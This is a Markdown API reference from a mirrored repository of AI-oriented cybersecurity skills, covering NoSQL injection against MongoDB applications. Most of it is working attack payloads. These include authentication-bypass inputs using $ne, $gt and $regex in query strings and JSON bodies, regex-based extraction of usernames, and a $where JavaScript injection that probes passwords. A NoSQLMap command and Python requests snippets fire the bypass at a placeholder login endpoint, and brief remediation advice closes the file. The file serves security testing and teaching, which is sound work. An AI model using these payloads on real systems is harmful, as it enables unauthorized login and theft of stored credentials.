creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 21:54:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/exploiting-nosql-injection-vulnerabilities/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

86 lines
2.2 KiB
Markdown
Raw Blame History

# API Reference: NoSQL Injection Testing
## MongoDB Query Operators
| Operator | Description | Injection Use |
|----------|-------------|---------------|
| `$ne` | Not equal | Bypass authentication |
| `$gt` | Greater than | Extract data |
| `$regex` | Regular expression | Pattern matching |
| `$exists` | Field exists | Enumerate fields |
| `$where` | JavaScript expression | Code execution |
| `$or` | Logical OR | Logic bypass |
## Authentication Bypass Payloads
### GET Parameters
```
?username[$ne]=&password[$ne]=
?username=admin&password[$gt]=
?username[$regex]=admin.*&password[$ne]=
```
### JSON Body
```json
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}
```
## Data Extraction
### Regex-Based Extraction
```json
{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}
```
### $where JavaScript Injection
```json
{"$where": "this.username == 'admin' && this.password.match(/^a/)"}
```
## Error-Based Detection
### MongoDB Error Messages
| Error | Indicator |
|-------|-----------|
| `MongoError` | MongoDB driver error |
| `CastError` | Invalid ObjectId |
| `BSONTypeError` | Invalid BSON type |
| `SyntaxError` | JavaScript parse error |
## Testing Tools
### NoSQLMap
```bash
python nosqlmap.py --url http://target/api/login --method POST \
--data '{"username":"test","password":"test"}'
```
### Burp Suite Intruder
Use NoSQL payload wordlist with parameter fuzzing.
## Python requests Testing
### GET Injection
```python
import requests
url = "http://target/api/users"
resp = requests.get(f"{url}?username[$ne]=&password[$ne]=")
```
### JSON Injection
```python
payload = {"username": {"$ne": ""}, "password": {"$ne": ""}}
resp = requests.post(url, json=payload)
```
## Remediation
1. Use parameterized queries (never concatenate user input)
2. Validate input types (reject objects where strings expected)
3. Use `mongo-sanitize` or equivalent input sanitization
4. Disable `$where` operator if not needed
5. Implement proper authentication (don't rely on query-level checks)
Reference in New Issue View Git Blame Copy Permalink